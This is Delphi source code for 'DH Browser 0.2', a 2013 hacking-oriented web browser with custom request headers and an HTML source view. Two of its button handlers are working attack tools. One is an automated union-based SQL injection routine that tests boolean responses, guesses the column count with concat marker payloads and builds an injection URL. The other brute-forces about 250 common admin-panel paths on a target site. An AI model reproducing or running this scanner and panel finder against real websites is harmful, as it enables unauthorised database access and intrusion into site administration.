// DH Browser 0.2// (C) Doddy Hackman 2013// Credits :// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htmunit programa;interfaceuses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, sSkinManager, StdCtrls, sButton, sEdit, OleCtrls, SHDocVw, sMemo, sListBox, sGroupBox, sLabel, sCheckBox, ComCtrls, sStatusBar, acPNG, ExtCtrls, mshtml, Menus, PerlRegEx, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, acProgressBar;type TForm2 = class(TForm) sSkinManager1: TsSkinManager; sGroupBox1: TsGroupBox; sEdit1: TsEdit; sButton1: TsButton; sGroupBox2: TsGroupBox; sMemo1: TsMemo; sCheckBox1: TsCheckBox; sGroupBox3: TsGroupBox; sStatusBar1: TsStatusBar; WebBrowser1: TWebBrowser; sGroupBox4: TsGroupBox; sButton2: TsButton; sButton3: TsButton; sGroupBox5: TsGroupBox; sButton4: TsButton; sLabel1: TsLabel; Image1: TImage; sMemo2: TsMemo; PopupMenu1: TPopupMenu; S1: TMenuItem; S2: TMenuItem; IdHTTP1: TIdHTTP; PerlRegEx1: TPerlRegEx; FindDialog1: TFindDialog; sProgressBar1: TsProgressBar; procedure sButton1Click(Sender: TObject); procedure S1Click(Sender: TObject); procedure S2Click(Sender: TObject); procedure sButton3Click(Sender: TObject); procedure sButton2Click(Sender: TObject); procedure sButton4Click(Sender: TObject); procedure FindDialog1Find(Sender: TObject); procedure FormClose(Sender: TObject; var Action: TCloseAction); procedure WebBrowser1ProgressChange(ASender: TObject; Progress, ProgressMax: Integer); procedure WebBrowser1DownloadComplete(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end;var Form2: TForm2;implementation{$R *.dfm}procedure TForm2.FindDialog1Find(Sender: TObject);// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143var aca: PChar; aca2: PChar; acatoy: PChar; acatoy2: Word;begin With Sender as TFindDialog do begin GetMem(aca2, Length(FindText) + 1); StrPCopy(aca2, FindText); acatoy2 := sMemo2.GetTextLen + 1; GetMem(aca, acatoy2); sMemo2.GetTextBuf(aca, acatoy2); acatoy := aca + sMemo2.SelStart + sMemo2.SelLength; acatoy := StrPos(acatoy, aca2); if not(acatoy = NIL) then begin sMemo2.SelStart := acatoy - aca; sMemo2.SelLength := Length(FindText); end; sMemo2.SetFocus; end;end;procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction);begin Application.Terminate;end;procedure TForm2.FormCreate(Sender: TObject);begin sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data'; sSkinManager1.SkinName := 'tv-b'; sSkinManager1.Active := True;end;procedure TForm2.S1Click(Sender: TObject);begin WebBrowser1.Visible := false; sMemo2.Visible := True;end;procedure TForm2.S2Click(Sender: TObject);begin WebBrowser1.Visible := True; sMemo2.Visible := false;end;procedure TForm2.sButton1Click(Sender: TObject);// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242var cabeceras: OLEVariant; uno: OLEVariant; dos: OLEVariant; tres: OLEVariant;begin uno := navNoReadFromCache or navNoWriteToCache; dos := ''; tres := ''; if (sCheckBox1.Checked) then begin cabeceras := sMemo1.Text; WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras); end else begin cabeceras := ''; WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras); end;end;procedure TForm2.sButton2Click(Sender: TObject);var pass1: string; pass2: string; code: string; urltest: string; urlgen: string; full: string; codedos: string; i: Integer;begin sStatusBar1.Panels[0].Text := '[+] SQLI Scanning ...'; Form2.sStatusBar1.Update; pass1 := '+'; pass2 := '--'; urltest := 'concat(0x4b30425241,1,0x4b30425241)'; sStatusBar1.Panels[0].Text := '[+] Checking ...'; Form2.sStatusBar1.Update; code := IdHTTP1.Get (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2); codedos := IdHTTP1.Get (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass2); if not(code = codedos) then begin sStatusBar1.Panels[0].Text := '[+] Finding columns number'; Form2.sStatusBar1.Update; urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 + 'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)'; urlgen := '1'; for i := 2 to 36 do begin sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i); Form2.sStatusBar1.Update; urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i) + ',0x4b30425241)'; urlgen := urlgen + ',' + IntToStr(i); code := IdHTTP1.Get(sEdit1.Text + urltest + pass2); PerlRegEx1.Regex := 'K0BRA(.*?)K0BRA'; PerlRegEx1.Subject := code; if PerlRegEx1.Match then begin urlgen := StringReplace(urlgen, PerlRegEx1.SubExpressions[1], 'hackman', []); full := sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 + 'select' + pass1 + urlgen; sEdit1.Text := full; Abort; end; end; end; sStatusBar1.Panels[0].Text := '[+] Done'; Form2.sStatusBar1.Update;end;procedure TForm2.sButton3Click(Sender: TObject);const paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx', 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp', 'asp/admin/admin.aspx', 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx', 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp', 'login/index.asp', 'login/index.aspx', 'login/login.asp', 'login/login.aspx', 'login/admin.asp', 'login/admin.aspx', 'administracion/index.asp', 'administracion/index.aspx', 'administracion/login.asp', 'administracion/login.aspx', 'administracion/webmaster.asp', 'administracion/webmaster.aspx', 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/', 'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php', 'administracion/', 'administracion/index.php', 'administracion/login.php', 'administracion/ingresar.php', 'administracion/admin.php', 'administration/', 'administration/index.php', 'administration/login.php', 'administrator/index.php', 'administrator/login.php', 'administrator/system.php', 'system/', 'system/login.php', 'admin.php', 'login.php', 'administrador.php', 'administration.php', 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/home.php', 'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/', 'administrator/index.html', 'administrator/login.html', 'administrator/account.html', 'administrator/account.php', 'administrator.html', 'login.html', 'modelsearch/login.php', 'moderator.php', 'moderator.html', 'moderator/login.php', 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html', 'moderator/', 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php', 'controlpanel.html', 'admincontrol.php', 'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp', 'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp', 'administrator/index.asp', 'administrator/login.asp', 'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp', 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp', 'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp', 'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp', 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp', 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/', 'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/', 'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/', 'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/', 'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/', 'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/', 'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/', 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/', 'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/', 'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/', 'system_administration/', 'ss_vms_admin_sm/');var IdHTTP: TIdHTTP; i: Integer; control: Integer;begin control := 0; sStatusBar1.Panels[0].Text := '[+] Finding Panel ....'; Form2.sStatusBar1.Update; IdHTTP := TIdHTTP.Create(nil); for i := Low(paginas) to High(paginas) do if (control = 1) then begin Abort; end else begin try sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i]; Form2.sStatusBar1.Update; IdHTTP.Get(sEdit1.Text + '/' + paginas[i]); if IdHTTP.ResponseCode = 200 then begin sStatusBar1.Panels[0].Text := '[+] Done'; Form2.sStatusBar1.Update; sEdit1.Text := sEdit1.Text + '/' + paginas[i]; control := 1; end; except on E: EIdHttpProtocolException do ; on E: Exception do ; end; end; sStatusBar1.Panels[0].Text := '[+] Done'; Form2.sStatusBar1.Update;end;procedure TForm2.sButton4Click(Sender: TObject);begin FindDialog1.Execute;end;procedure TForm2.WebBrowser1DownloadComplete(Sender: TObject);var buscador: IHTMLElement;begin sProgressBar1.Position := 0; // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm begin try begin sMemo2.Clear; buscador := (WebBrowser1.Document AS IHTMLDocument2).body; while not(buscador.parentElement = nil) do begin buscador := buscador.parentElement; end; sMemo2.Lines.Add(buscador.outerHTML); end; except // ?? end; end;end;procedure TForm2.WebBrowser1ProgressChange(ASender: TObject; Progress, ProgressMax: Integer);begin sProgressBar1.Max := ProgressMax; sProgressBar1.Position := Progress;end;end.// The End ?